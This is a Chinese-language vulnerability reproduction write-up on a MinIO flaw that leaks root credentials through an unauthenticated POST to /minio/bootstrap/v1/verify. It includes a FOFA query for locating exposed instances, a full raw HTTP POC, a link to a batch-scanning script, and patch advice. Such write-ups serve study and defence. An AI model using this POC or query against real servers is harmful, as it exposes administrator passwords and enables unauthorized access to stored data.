文章目录
- 0x01 前言
- 0x02 漏洞描述
- 0x03 影响范围
- 0x04 漏洞复现
- 1.启动环境
- 2.查看端口
- 3.构造POC
- 0x05 修复建议
0x01 前言
本次测试仅供学习使用,如若非法他用,与本文作者无关,需自行负责!!!
0x02 漏洞描述
MinIO 是一款高性能、分布式的对象存储系统. 它是一款软件产品, 可以100%的运行在标准硬件。即X86等低成本机器也能够很好的运行MinIO。兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据,例如图片、视频、日志文件、备份数据和容器/虚拟机镜像等。
MinIO中存在一处信息泄露漏洞,由于Minio集群进行信息交换的9000端口,在未经配置的情况下通过发送特殊HPPT请求进行未授权访问,进而导致MinIO对象存储的相关环境变量泄露,环境变量中包含密钥信息(MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),能看到对应权限的存储文件。
0x03 影响范围
RELEASE.2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z
(注意:MinIO漏洞利用的前提是其使用集群模式配置)
0x04 漏洞复现
1.启动环境
fofa:banner=“MinIO” || header=“MinIO” || title=“MinIO Browser”
Sudo docker-compose up -d
2.查看端口
Sudo docker ps
集群启动后,访问http://your-ip:9001可以查看Web管理页面,访问http://your-ip:9000是API服务。
注意:这个漏洞存在于API节点http://your-ip:9000/minio/bootstrap/v1/verify上
3.构造POC
POC
POST /minio/bootstrap/v1/verify HTTP/1.1
Host: your-ip:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
其他版本批量检测POC
https://github.com/MzzdToT/CVE-2023-28432/blob/main/minio.py
可以看见,其中包含MINIO_ROOT_USER和MINIO_ROOT_PASSWORD。使用这个账号密码,即可成功登录管理后台。
0x05 修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z